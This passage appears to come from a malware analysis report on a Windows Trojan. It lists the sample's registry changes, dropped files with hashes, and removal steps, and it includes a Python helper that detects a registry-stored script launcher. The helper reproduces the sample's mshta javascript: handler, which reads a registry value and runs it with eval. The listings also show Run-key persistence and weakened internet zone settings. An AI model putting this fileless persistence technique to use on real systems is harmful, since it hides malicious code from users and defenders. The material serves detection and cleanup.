"ProxyOverride"
"ProxyServer"
"AutoConfigURL"
The Trojan disables automatic startup of an application by deleting the following autorun value(s):
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"dvqs"
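The regsvr32.exe:2380 and regsvr32.exe:324 listings above are where this sample's own behaviour shows through the noise of the bundled KB968930 installer (Windows Management Framework Core, i.e. PowerShell 2.0 and WinRM 2.0, which accounts for the PSCustomSetupUtil, Fusion/GAC and WSMAN entries). The sample-specific chain is a private file class `.48198b5` mapped to ProgID `ecb437`, whose `shell\open\command` runs `mshta javascript:` that reads `HKCU\software\trss\lbkg` through `WScript.Shell.RegRead` and hands the result to `eval`, alongside the `ohev.exe` autorun entries and the ZoneMap/proxy changes. The following Python helper is an added example written for this page; it is not part of the Lavasoft report or of the analysed sample. It parses listings in the report's own `[KEY]` / `"name" = "data"` format and reconstructs that chain. The embedded sample is copied from the lines above with the `lbkg` blob truncated, and the parser assumes the report's conventions (a quoted line without ` = ` is a value name with no data).

```python
r"""Triage helper for sandbox registry listings in the format used in this report.

Added example for this page, not part of the Lavasoft report or the sample. It
parses '[KEY]' / '"name" = "data"' lines and follows the chain
  file-extension class -> ProgID shell\open\command -> mshta javascript:
  -> registry value read via RegRead() and passed to eval()
which is the registry-resident launcher visible in the regsvr32.exe:324 section.
"""
import re

KEY_RE = re.compile(r'^\[(?P<key>[^\]]+)\]$')
VAL_RE = re.compile(r'^"(?P<name>.*?)"\s*=\s*"(?P<data>.*)"$')
NAME_ONLY_RE = re.compile(r'^"(?P<name>.*)"$')  # value listed without data

# Constructed sample: lines copied from the regsvr32.exe:324 section of the
# report, with the long "lbkg" blob truncated to keep the example short.
SAMPLE = r"""
[HKCU\Software\trss]
"lbkg" = "CkfRswnkRLwfKcdQ8zjDJDq=FWpTjLsGn7KQi7eiWqjoqY6pYhWMDlpSTIuYtT;R0a0U=2E3B050107352D73"
"zzpziqo" = "%Documents and Settings%\%current user%\Local Settings\Application Data\ohev\ohev.exe"
[HKCU\Software\Classes\ecb437\shell\open\command]
"(Default)" = "mshta javascript:E9uj6YSw=UqJyj5RF;t1F=new ActiveXObject(WScript.Shell);DQ6XcBejI1=hkHKd6G4;cBI9Z=t1F.RegRead(HKCU\\software\\trss\\lbkg);GBqq4HH=9nLHo8;eval(cBI9Z);EsCPMo71=2h;"
[HKCU\Software\Classes\.48198b5]
"(Default)" = "ecb437"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"c:\documents and settings\"%CurrentUserName%"\local settings\application data\ohev\ohev.exe"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
"ProxyBypass" = "1"
"IntranetName" = "1"
"""


def parse_registry_listing(text):
    """Return a list of (key, value_name, data_or_None) from the report text."""
    entries, key = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        m = KEY_RE.match(line)
        if m:
            key = m.group('key')
            continue
        m = VAL_RE.match(line) or NAME_ONLY_RE.match(line)
        if m and key is not None:
            entries.append((key, m.group('name'), m.groupdict().get('data')))
    return entries


def registry_path(js_arg):
    """Normalise a RegRead() argument as printed in the report (doubled backslashes)."""
    return js_arg.strip().strip('"\'').replace('\\\\', '\\').lower()


def find_indicators(entries):
    """Derive the sample-specific indicators from a parsed listing."""
    hits = {'autorun': [], 'zonemap_widened': [], 'script_launcher': []}
    commands, extensions, values = {}, {}, {}
    for key, name, data in entries:
        k = key.lower()
        values[(k, name.lower())] = data
        m = re.search(r'\\classes\\([^\\.][^\\]*)\\shell\\open\\command$', k)
        if m:
            commands[m.group(1)] = data or ''
        m = re.search(r'\\classes\\(\.[^\\]+)$', k)
        if m and name == '(Default)':
            extensions[m.group(1)] = (data or '').lower()
        if k.endswith(r'\currentversion\run'):
            # the report prints only the value name when the entry has no data
            hits['autorun'].append((key, data if data is not None else name))
        if (k.endswith(r'\internet settings\zonemap')
                and name in ('UNCAsIntranet', 'IntranetName', 'ProxyBypass')
                and data == '1'):
            hits['zonemap_widened'].append((key, name))
    for progid, cmd in commands.items():
        low = cmd.lower()
        if not all(tok in low for tok in ('mshta', 'javascript:', 'regread', 'eval')):
            continue
        m = re.search(r'regread\(([^)]+)\)', low)
        src = registry_path(m.group(1)) if m else None
        payload = None
        if src:
            src_key, _, src_name = src.rpartition('\\')
            payload = values.get((src_key, src_name))  # was the script body also written?
        hits['script_launcher'].append({
            'progid': progid,
            'extensions': sorted(e for e, p in extensions.items() if p == progid),
            'reads': src,
            'payload_bytes': None if payload is None else len(payload),
        })
    return hits


if __name__ == '__main__':
    for kind, items in find_indicators(parse_registry_listing(SAMPLE)).items():
        for item in items:
            print(kind, item)
```

Run against a saved copy of a report this yields the ProgID, the extension that triggers it, the registry value the launcher reads and how large that value is; a non-`None` `payload_bytes` confirms that the script body was written in the same session as the handler that consumes it. On a live host the same correlation is done by reading `HKCU\Software\Classes` and the `Run` keys directly, which is outside this example.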
The process wsmanhttpconfig.exe:3892 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C6 61 2A AF 82 B1 8F 54 C6 94 96 EB 9B 85 D3 EB"
The process wsmanhttpconfig.exe:3828 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B4 1E 83 E7 C1 82 B8 77 2D D6 9A 93 4B 0C DB AA"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN\Plugin\Event Forwarding Plugin]
"ConfigXML" = ""
[HKLM\System\CurrentControlSet\Services\HTTP\Parameters\UrlAclInfo]
"http:// :47001/wsman/" = "01 00 04 80 00 00 00 00 00 00 00 00 00 00 00 00"
[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]
"80:TCP" = "80:TCP:*:Enabled:Windows Remote Management - Compatibility Mode (HTTP-In)"
[HKLM\System\CurrentControlSet\Services\HTTP\Parameters\UrlAclInfo]
"https:// :5986/wsman/" = "01 00 04 80 00 00 00 00 00 00 00 00 00 00 00 00"
[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]
"5985:TCP" = "5985:TCP:*:Enabled:Windows Remote Management"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN]
"UpdatedConfig" = "D2861E38-B21F-453E-9F77-6D7A55E86098"
[HKLM\System\CurrentControlSet\Services\HTTP\Parameters\UrlAclInfo]
"http:// :5985/wsman/" = "01 00 04 80 00 00 00 00 00 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN\Plugin\WMI Provider]
"ConfigXML" = ""
Dropped PE files
MD5 | File path |
---|---|
85d7ab466d0577c49fc9879107ec7ef5 | c:\82ea8d5099742dc8f49f42\compiledcomposition.microsoft.powershell.gpowershell.dll |
2f7fe3a781ba8c0a67c775f20e3e9f70 | c:\82ea8d5099742dc8f49f42\microsoft.backgroundintelligenttransfer.management.dll |
173d3dd1425a8e33fa1d4ed71067a3a2 | c:\82ea8d5099742dc8f49f42\microsoft.backgroundintelligenttransfer.management.interop.dll |
75c183e262bd4400eb0f20349f6ef383 | c:\82ea8d5099742dc8f49f42\microsoft.backgroundintelligenttransfer.management.resources.dll |
08e87e8abf7b41b28663dce817ce0ab6 | c:\82ea8d5099742dc8f49f42\microsoft.powershell.commands.diagnostics.dll |
4e2482e69baaf3a5b13db8101c063ebf | c:\82ea8d5099742dc8f49f42\microsoft.powershell.commands.diagnostics.resources.dll |
f3ac3f844f90380aab2b4c0836c4288f | c:\82ea8d5099742dc8f49f42\microsoft.powershell.commands.management.dll |
b87e087fc013225e2aa1cb60c080647d | c:\82ea8d5099742dc8f49f42\microsoft.powershell.commands.management.resources.dll |
dfeb401cc051e5da721c584ff6a90f88 | c:\82ea8d5099742dc8f49f42\microsoft.powershell.commands.utility.dll |
1ce73fb3f88c716cfc3fd550547d2b35 | c:\82ea8d5099742dc8f49f42\microsoft.powershell.commands.utility.resources.dll |
3991b7fa452a9c9c291c06365a236792 | c:\82ea8d5099742dc8f49f42\microsoft.powershell.consolehost.dll |
36ff641f37918f2cca98e7f407ac4d75 | c:\82ea8d5099742dc8f49f42\microsoft.powershell.consolehost.resources.dll |
208fa9d0ebe2ceb9616042772e96598e | c:\82ea8d5099742dc8f49f42\microsoft.powershell.editor.dll |
37bed865557084dd9988350ab1675e0b | c:\82ea8d5099742dc8f49f42\microsoft.powershell.editor.resources.dll |
d4eefccdc3de6ced901535fa4153c491 | c:\82ea8d5099742dc8f49f42\microsoft.powershell.gpowershell.dll |
71d8f6d5dc35517275bc38ebcc815f9f | c:\Documents and Settings\"%CurrentUserName%"\Application Data\UUPPHBZOfNIWNOEBZBhdR.exe |
9859a26d5e72bbb0685af813b409d99d | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\WindowsXP-KB968930-x86-ENG.exe |
fc9a05096522bb6d7ceda62ea1707420 | c:\WINDOWS\$968930Uinstall_KB968930$\PSCustomSetupUtil.exe |
35efd8cd6549a4339cb2a28c8cfd6598 | c:\WINDOWS\$968930Uinstall_KB968930$\PSSetupNativeUtils.exe |
a39df582ca051afc8811fbd00db12f10 | c:\WINDOWS\$968930Uinstall_KB968930$\spuninst\spuninst.exe |
9a055da2f2819f155c33d47cd67a7c00 | c:\WINDOWS\$968930Uinstall_KB968930$\spuninst\updspapi.dll |
75c183e262bd4400eb0f20349f6ef383 | c:\WINDOWS\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management.resources\1.0.0.0_en_31bf3856ad364e35\Microsoft.BackgroundIntelligentTransfer.Management.resources.dll |
2f7fe3a781ba8c0a67c775f20e3e9f70 | c:\WINDOWS\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\1.0.0.0__31bf3856ad364e35\Microsoft.BackgroundIntelligentTransfer.Management.dll |
4e2482e69baaf3a5b13db8101c063ebf | c:\WINDOWS\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Diagnostics.resources\1.0.0.0_en_31bf3856ad364e35\Microsoft.PowerShell.Commands.Diagnostics.resources.dll |
08e87e8abf7b41b28663dce817ce0ab6 | c:\WINDOWS\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Diagnostics\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Diagnostics.dll |
b87e087fc013225e2aa1cb60c080647d | c:\WINDOWS\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management.resources\1.0.0.0_en_31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.resources.dll |
f3ac3f844f90380aab2b4c0836c4288f | c:\WINDOWS\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll |
1ce73fb3f88c716cfc3fd550547d2b35 | c:\WINDOWS\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility.resources\1.0.0.0_en_31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.resources.dll |
dfeb401cc051e5da721c584ff6a90f88 | c:\WINDOWS\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll |
36ff641f37918f2cca98e7f407ac4d75 | c:\WINDOWS\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost.resources\1.0.0.0_en_31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.resources.dll |
3991b7fa452a9c9c291c06365a236792 | c:\WINDOWS\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll |
c7a0d1321a67a2afd330c5fbe79befd1 | c:\WINDOWS\assembly\GAC_MSIL\Microsoft.PowerShell.Security.resources\1.0.0.0_en_31bf3856ad364e35\Microsoft.PowerShell.Security.resources.dll |
53a9d748ef09920a0d06da2583c298ad | c:\WINDOWS\assembly\GAC_MSIL\Microsoft.PowerShell.Security\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll |
6372ea7d2aced7185183cf3fcdd3577b | c:\WINDOWS\assembly\GAC_MSIL\Microsoft.WSMan.Management.resources\1.0.0.0_en_31bf3856ad364e35\Microsoft.WSMan.Management.resources.dll |
1a4e900c2fe3cd31d10107670d184fe6 | c:\WINDOWS\assembly\GAC_MSIL\Microsoft.WSMan.Management\1.0.0.0__31bf3856ad364e35\Microsoft.WSMan.Management.dll |
f7da27672d2e4c21a1f996ee31de0dbf | c:\WINDOWS\assembly\GAC_MSIL\Microsoft.WSMan.Runtime\1.0.0.0__31bf3856ad364e35\Microsoft.WSMan.Runtime.dll |
2286b57ecc2d32d24049c51989084268 | c:\WINDOWS\assembly\GAC_MSIL\System.Management.Automation.resources\1.0.0.0_en_31bf3856ad364e35\System.Management.Automation.resources.dll |
4d8ab4fad244f7985d8c59d456e026d7 | c:\WINDOWS\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll |
85d7ab466d0577c49fc9879107ec7ef5 | c:\WINDOWS\system32\WindowsPowerShell\v1.0\CompiledComposition.Microsoft.PowerShell.GPowerShell.dll |
173d3dd1425a8e33fa1d4ed71067a3a2 | c:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\BitsTransfer\microsoft.backgroundintelligenttransfer.management.interop.dll |
df4217ddb34a0b73dc7aac7829371c0c | c:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell.exe |
fe7bc06af17d7cd8fb8e6d72d72453b8 | c:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell.exe.mui |
36b6f71b6d7d280302b348145db05a9f | c:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell_ise.exe |
cb3a534127f37d0fa1f556dbb76575d3 | c:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell_ise.resources.dll |
95b7f12a557dedac5e4a1e9afa5e73ab | c:\WINDOWS\system32\WindowsPowerShell\v1.0\pspluginwkr.dll |
a94243b797377ba03b63fc716c13bcf5 | c:\WINDOWS\system32\WindowsPowerShell\v1.0\pwrshmsg.dll |
7943a80f1a6fd37969aacd411b511f91 | c:\WINDOWS\system32\WindowsPowerShell\v1.0\pwrshsip.dll |
2c9c9ae86eb2b4e78c8e09deb7509a63 | c:\WINDOWS\system32\WsmAuto.dll |
67146d3606be1111a39f0fd61f47e9b6 | c:\WINDOWS\system32\WsmRes.dll |
18f347402da544a780949b8fdf83351b | c:\WINDOWS\system32\WsmSvc.dll |
296e6992278fea7140d88b603e6c2a8a | c:\WINDOWS\system32\WsmWmiPl.dll |
8c386819bf5b39d7a4b274d0b55f87a5 | c:\WINDOWS\system32\pwrshplugin.dll |
84e025b1259c66315f4d45a6caecacc9 | c:\WINDOWS\system32\wevtfwd.dll |
cd17705af8e53a82facb545a213ab09c | c:\WINDOWS\system32\winrmprov.dll |
afdf7654880ce23005014895b129d948 | c:\WINDOWS\system32\winrs.exe |
3e9b11880ae4a8ff399ce0573c82655b | c:\WINDOWS\system32\winrscmd.dll |
62021e3e6ba13d72cf5cc1047cfac991 | c:\WINDOWS\system32\winrshost.exe |
b84092e52861a026fc83bcede4a7abfa | c:\WINDOWS\system32\winrsmgr.dll |
35bc7c49676e5ab617ef94dc9854a6f1 | c:\WINDOWS\system32\winrssrv.dll |
972916faac89c4aa978952b30f478e81 | c:\WINDOWS\system32\wsmanhttpconfig.exe |
23ce21efc2ae95700f2b1f9582fe3867 | c:\WINDOWS\system32\wsmplpxy.dll |
faa2fcc6853e5123e05dccc5919657e2 | c:\WINDOWS\system32\wsmprovhost.exe |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
Removals
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):
%original file name%.exe:312
PSSetupNativeUtils.exe:3556
mofcomp.exe:3924
wscript.exe:1992
WindowsXP-KB968930-x86-ENG.exe:2764
ngen.exe:2472
ngen.exe:2904
ngen.exe:2456
ngen.exe:2564
ngen.exe:3000
ngen.exe:2960
ngen.exe:1816
ngen.exe:2520
ngen.exe:2484
ngen.exe:2980
ngen.exe:2348
ngen.exe:3020
ngen.exe:2500
ngen.exe:2444
ngen.exe:2580
ngen.exe:224
ngen.exe:784
ngen.exe:2992
ngen.exe:2492
ngen.exe:2412
ngen.exe:2372
ngen.exe:2532
ngen.exe:2512
update.exe:2828
mscorsvw.exe:2656
mscorsvw.exe:1088
mscorsvw.exe:3536
mscorsvw.exe:3068
mscorsvw.exe:2320
mscorsvw.exe:524
mscorsvw.exe:2152
mscorsvw.exe:420
mscorsvw.exe:2408
mscorsvw.exe:2360
mscorsvw.exe:2580
mscorsvw.exe:3072
mscorsvw.exe:3724
mscorsvw.exe:3644
mscorsvw.exe:3720
mscorsvw.exe:2516
mscorsvw.exe:3204
mscorsvw.exe:3784
mscorsvw.exe:3396
mscorsvw.exe:3224
mscorsvw.exe:3036
mscorsvw.exe:2896
mscorsvw.exe:1768
mscorsvw.exe:2008
PSCustomSetupUtil.exe:452
PSCustomSetupUtil.exe:1096
PSCustomSetupUtil.exe:2824
PSCustomSetupUtil.exe:4024
PSCustomSetupUtil.exe:252
PSCustomSetupUtil.exe:2800
PSCustomSetupUtil.exe:796
PSCustomSetupUtil.exe:4064
PSCustomSetupUtil.exe:320
PSCustomSetupUtil.exe:2648
PSCustomSetupUtil.exe:4092
PSCustomSetupUtil.exe:584
PSCustomSetupUtil.exe:2708
PSCustomSetupUtil.exe:2624
PSCustomSetupUtil.exe:2568
PSCustomSetupUtil.exe:2608
PSCustomSetupUtil.exe:2696
PSCustomSetupUtil.exe:1880
PSCustomSetupUtil.exe:1992
PSCustomSetupUtil.exe:1540
PSCustomSetupUtil.exe:1288
PSCustomSetupUtil.exe:2756
PSCustomSetupUtil.exe:3964
PSCustomSetupUtil.exe:3988
PSCustomSetupUtil.exe:648
PSCustomSetupUtil.exe:2008
UUPPHBZOfNIWNOEBZBhdR.exe:1076
regsvr32.exe:2380
regsvr32.exe:1752
wsmanhttpconfig.exe:3892
wsmanhttpconfig.exe:3828
- Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
%Documents and Settings%\%current user%\Local Settings\Temp\IXP000.TMP\TcEMbLQgCOBP (4077 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\IXP000.TMP\UUPPHBZOfNIWNOEBZBh (803 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\IXP000.TMP\UUPPHBZOfNIWNOEBZBhdR.exe (13304 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk (2 bytes)
%System%\wbem\Logs\mofcomp.log (1814 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\tmpCF.tmp (1 bytes)
C:\82ea8d5099742dc8f49f42\wsmres.dll (6164 bytes)
C:\82ea8d5099742dc8f49f42\about_switch.help.txt (489 bytes)
C:\82ea8d5099742dc8f49f42\about_foreach.help.txt (10 bytes)
C:\82ea8d5099742dc8f49f42\about_functions.help.txt (586 bytes)
C:\82ea8d5099742dc8f49f42\about_do.help.txt (2 bytes)
C:\82ea8d5099742dc8f49f42\microsoft.powershell.commands.diagnostics.dll-help.xml (2301 bytes)
C:\82ea8d5099742dc8f49f42\eventforwarding.adm (2 bytes)
C:\82ea8d5099742dc8f49f42\about_pssessions.help.txt (9 bytes)
C:\82ea8d5099742dc8f49f42\about_wildcards.help.txt (3 bytes)
C:\82ea8d5099742dc8f49f42\microsoft.powershell.security.resources.dll (9 bytes)
C:\82ea8d5099742dc8f49f42\wsmpty.xsl (1 bytes)
C:\82ea8d5099742dc8f49f42\about_remote.help.txt (7 bytes)
C:\82ea8d5099742dc8f49f42\about_debuggers.help.txt (21 bytes)
C:\82ea8d5099742dc8f49f42\microsoft.powershell.security.dll (1145 bytes)
C:\82ea8d5099742dc8f49f42\about_command_syntax.help.txt (5 bytes)
C:\82ea8d5099742dc8f49f42\microsoft.powershell.graphicalhost.resources.dll (16 bytes)
C:\82ea8d5099742dc8f49f42\about_requires.help.txt (2 bytes)
C:\82ea8d5099742dc8f49f42\pspluginwkr.dll (1756 bytes)
C:\82ea8d5099742dc8f49f42\certificate.format.ps1xml (155 bytes)
C:\82ea8d5099742dc8f49f42\diagnostics.format.ps1xml (590 bytes)
C:\82ea8d5099742dc8f49f42\about_break.help.txt (792 bytes)
C:\82ea8d5099742dc8f49f42\wsmauto.dll (1842 bytes)
C:\82ea8d5099742dc8f49f42\powershell_ise.exe (2526 bytes)
C:\82ea8d5099742dc8f49f42\about_quoting_rules.help.txt (659 bytes)
C:\82ea8d5099742dc8f49f42\winrscmd.dll (2907 bytes)
C:\82ea8d5099742dc8f49f42\microsoft.powershell.gpowershell.resources.dll (408 bytes)
C:\82ea8d5099742dc8f49f42\powershell_ise.resources.dll (4 bytes)
C:\82ea8d5099742dc8f49f42\update\kb968930xp.cat (512 bytes)
C:\82ea8d5099742dc8f49f42\getevent.types.ps1xml (15 bytes)
C:\82ea8d5099742dc8f49f42\winrmprov.mof (789 bytes)
C:\82ea8d5099742dc8f49f42\wsmwmipl.dll (2816 bytes)
C:\82ea8d5099742dc8f49f42\update\update.exe (10748 bytes)
C:\82ea8d5099742dc8f49f42\default.help.txt (2 bytes)
C:\82ea8d5099742dc8f49f42\wevtfwd.dll (3351 bytes)
C:\82ea8d5099742dc8f49f42\about_if.help.txt (3 bytes)
C:\82ea8d5099742dc8f49f42\about_assignment_operators.help.txt (379 bytes)
C:\82ea8d5099742dc8f49f42\about_variables.help.txt (6 bytes)
C:\82ea8d5099742dc8f49f42\winrm.vbs (2727 bytes)
C:\82ea8d5099742dc8f49f42\wtrinstaller.ico (4803 bytes)
C:\82ea8d5099742dc8f49f42\about_history.help.txt (3 bytes)
C:\82ea8d5099742dc8f49f42\pscustomsetuputil.exe (316 bytes)
C:\82ea8d5099742dc8f49f42\microsoft.powershell.consolehost.resources.dll (778 bytes)
C:\82ea8d5099742dc8f49f42\about_type_operators.help.txt (5 bytes)
C:\82ea8d5099742dc8f49f42\about_join.help.txt (2 bytes)
C:\82ea8d5099742dc8f49f42\powershell.exe (7339 bytes)
C:\82ea8d5099742dc8f49f42\about_pipelines.help.txt (411 bytes)
C:\82ea8d5099742dc8f49f42\about_arrays.help.txt (8 bytes)
C:\82ea8d5099742dc8f49f42\about_line_editing.help.txt (1 bytes)
C:\82ea8d5099742dc8f49f42\about_functions_advanced.help.txt (3 bytes)
C:\82ea8d5099742dc8f49f42\microsoft.backgroundintelligenttransfer.management.resources.dll (7 bytes)
C:\82ea8d5099742dc8f49f42\about_commonparameters.help.txt (12 bytes)
C:\82ea8d5099742dc8f49f42\about_data_sections.help.txt (5 bytes)
C:\82ea8d5099742dc8f49f42\about_path_syntax.help.txt (5 bytes)
C:\82ea8d5099742dc8f49f42\microsoft.wsman.management.dll-help.xml (8740 bytes)
C:\82ea8d5099742dc8f49f42\compiledcomposition.microsoft.powershell.gpowershell.dll (1737 bytes)
C:\82ea8d5099742dc8f49f42\update\update.inf (2457 bytes)
C:\82ea8d5099742dc8f49f42\about_continue.help.txt (1 bytes)
C:\82ea8d5099742dc8f49f42\pwrshplugin.dll (802 bytes)
C:\82ea8d5099742dc8f49f42\importallmodules.psd1 (438 bytes)
C:\82ea8d5099742dc8f49f42\winrm.cmd (35 bytes)
C:\82ea8d5099742dc8f49f42\spmsg.dll (495 bytes)
C:\82ea8d5099742dc8f49f42\update\update.ver (14 bytes)
C:\82ea8d5099742dc8f49f42\microsoft.powershell.commands.management.dll (3386 bytes)
C:\82ea8d5099742dc8f49f42\microsoft.powershell.consolehost.dll-help.xml (900 bytes)
C:\82ea8d5099742dc8f49f42\about_pssession_details.help.txt (9 bytes)
C:\82ea8d5099742dc8f49f42\types.ps1xml (2510 bytes)
C:\82ea8d5099742dc8f49f42\winrs.exe (1154 bytes)
C:\82ea8d5099742dc8f49f42\about_command_precedence.help.txt (8 bytes)
C:\82ea8d5099742dc8f49f42\winrssrv.dll (12 bytes)
C:\82ea8d5099742dc8f49f42\about_parsing.help.txt (2 bytes)
C:\82ea8d5099742dc8f49f42\help.format.ps1xml (3947 bytes)
C:\82ea8d5099742dc8f49f42\about_core_commands.help.txt (221 bytes)
C:\82ea8d5099742dc8f49f42\about_properties.help.txt (7 bytes)
C:\82ea8d5099742dc8f49f42\about_remote_troubleshooting.help.txt (146 bytes)
C:\82ea8d5099742dc8f49f42\about_signing.help.txt (12 bytes)
C:\82ea8d5099742dc8f49f42\about_regular_expressions.help.txt (5 bytes)
C:\82ea8d5099742dc8f49f42\about_profiles.help.txt (457 bytes)
C:\82ea8d5099742dc8f49f42\bitstransfer.psd1 (950 bytes)
C:\82ea8d5099742dc8f49f42\about_providers.help.txt (59 bytes)
C:\82ea8d5099742dc8f49f42\pwrshmsg.dll (4 bytes)
C:\82ea8d5099742dc8f49f42\about_remote_output.help.txt (887 bytes)
C:\82ea8d5099742dc8f49f42\about_hash_tables.help.txt (6 bytes)
C:\82ea8d5099742dc8f49f42\about_reserved_words.help.txt (1 bytes)
C:\82ea8d5099742dc8f49f42\bitstransfer.format.ps1xml (16 bytes)
C:\82ea8d5099742dc8f49f42\about_scopes.help.txt (76 bytes)
C:\82ea8d5099742dc8f49f42\about_trap.help.txt (10 bytes)
C:\82ea8d5099742dc8f49f42\about_environment_variables.help.txt (417 bytes)
C:\82ea8d5099742dc8f49f42\about_objects.help.txt (2 bytes)
C:\82ea8d5099742dc8f49f42\system.management.automation.dll (38414 bytes)
C:\82ea8d5099742dc8f49f42\about_ws-management_cmdlets.help.txt (405 bytes)
C:\82ea8d5099742dc8f49f42\microsoft.powershell.graphicalhost.dll (4408 bytes)
C:\82ea8d5099742dc8f49f42\$shtdwn$.req (788 bytes)
C:\82ea8d5099742dc8f49f42\about_windows_powershell_2.0.help.txt (453 bytes)
C:\82ea8d5099742dc8f49f42\microsoft.powershell.commands.management.dll-help.xml (28236 bytes)
C:\82ea8d5099742dc8f49f42\about_wmi_cmdlets.help.txt (8 bytes)
C:\82ea8d5099742dc8f49f42\microsoft.powershell.editor.resources.dll (562 bytes)
C:\82ea8d5099742dc8f49f42\about_prompts.help.txt (7 bytes)
C:\82ea8d5099742dc8f49f42\about_throw.help.txt (5 bytes)
C:\82ea8d5099742dc8f49f42\filesystem.format.ps1xml (133 bytes)
C:\82ea8d5099742dc8f49f42\about_comment_based_help.help.txt (595 bytes)
C:\82ea8d5099742dc8f49f42\system.management.automation.resources.dll (3153 bytes)
C:\82ea8d5099742dc8f49f42\about_parameters.help.txt (9 bytes)
C:\82ea8d5099742dc8f49f42\about_eventlogs.help.txt (5 bytes)
C:\82ea8d5099742dc8f49f42\spuninst.exe (3787 bytes)
C:\82ea8d5099742dc8f49f42\about_scripts.help.txt (12 bytes)
C:\82ea8d5099742dc8f49f42\microsoft.wsman.management.resources.dll (13 bytes)
C:\82ea8d5099742dc8f49f42\about_try_catch_finally.help.txt (7 bytes)
C:\82ea8d5099742dc8f49f42\about_modules.help.txt (13 bytes)
C:\82ea8d5099742dc8f49f42\microsoft.backgroundintelligenttransfer.management.dll-help.xml (2472 bytes)
C:\82ea8d5099742dc8f49f42\registry.format.ps1xml (20 bytes)
C:\82ea8d5099742dc8f49f42\windowsremoteshell.adm (12 bytes)
C:\82ea8d5099742dc8f49f42\about_ref.help.txt (1 bytes)
C:\82ea8d5099742dc8f49f42\system.management.automation.dll-help.xml (16567 bytes)
C:\82ea8d5099742dc8f49f42\winrm.ini (1956 bytes)
C:\82ea8d5099742dc8f49f42\about_functions_advanced_methods.help.txt (9 bytes)
C:\82ea8d5099742dc8f49f42\about_for.help.txt (146 bytes)
C:\82ea8d5099742dc8f49f42\powershellcore.format.ps1xml (1492 bytes)
C:\82ea8d5099742dc8f49f42\about_split.help.txt (10 bytes)
C:\82ea8d5099742dc8f49f42\winrmprov.dll (591 bytes)
C:\82ea8d5099742dc8f49f42\winrshost.exe (22 bytes)
C:\82ea8d5099742dc8f49f42\microsoft.powershell.editor.dll (14450 bytes)
C:\82ea8d5099742dc8f49f42\about_methods.help.txt (6 bytes)
C:\82ea8d5099742dc8f49f42\about_bits_cmdlets.help.txt (7 bytes)
C:\82ea8d5099742dc8f49f42\wsmtxt.xsl (2 bytes)
C:\82ea8d5099742dc8f49f42\wsmauto.mof (4 bytes)
C:\82ea8d5099742dc8f49f42\about_operators.help.txt (770 bytes)
C:\82ea8d5099742dc8f49f42\update\updspapi.dll (5940 bytes)
C:\82ea8d5099742dc8f49f42\microsoft.backgroundintelligenttransfer.management.interop.dll (1532 bytes)
C:\82ea8d5099742dc8f49f42\microsoft.powershell.commands.utility.dll-help.xml (20810 bytes)
C:\82ea8d5099742dc8f49f42\about_script_blocks.help.txt (3 bytes)
C:\82ea8d5099742dc8f49f42\wsman.format.ps1xml (837 bytes)
C:\82ea8d5099742dc8f49f42\about_format.ps1xml.help.txt (17 bytes)
C:\82ea8d5099742dc8f49f42\about_job_details.help.txt (824 bytes)
C:\82ea8d5099742dc8f49f42\spupdsvc.exe (287 bytes)
C:\82ea8d5099742dc8f49f42\winrsmgr.dll (2 bytes)
C:\82ea8d5099742dc8f49f42\windowsremotemanagement.adm (574 bytes)
